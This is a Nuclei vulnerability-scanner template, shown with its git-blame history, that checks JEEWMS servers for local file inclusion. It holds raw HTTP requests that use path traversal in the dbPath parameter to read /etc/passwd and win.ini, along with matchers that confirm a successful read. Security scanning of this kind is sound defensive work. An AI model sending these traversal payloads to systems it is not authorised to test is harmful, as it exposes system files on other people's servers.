nuclei-templates/vulnerabilities/other/jeewms-lfi.yaml

id: jeewms-lfi

info:
  name: JEEWMS LFI
  author: pikpikcu
  severity: high
  reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
  tags: jeewms,lfi

requests:
  - raw:
      - | #linux
        GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - | #windows
        GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body

      - type: status
        status:
          - 200
Create jeewms-lfi.yaml 2021-06-01 09:08:45 +00:00			`id: jeewms-lfi`

			`info:`
			`name: JEEWMS LFI`
			`author: pikpikcu`
			`severity: high`
			`reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g`
			`tags: jeewms,lfi`

			`requests:`
			`- raw:`
			`- \| #linux`
			`GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`- \| #windows`
			`GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0"`
Update jeewms-lfi.yaml 2021-06-22 12:58:52 +00:00			`- "\\[(font\|extension\|file)s\\]"`
			`condition: or`
			`part: body`
Create jeewms-lfi.yaml 2021-06-01 09:08:45 +00:00
			`- type: status`
			`status:`
			`- 200`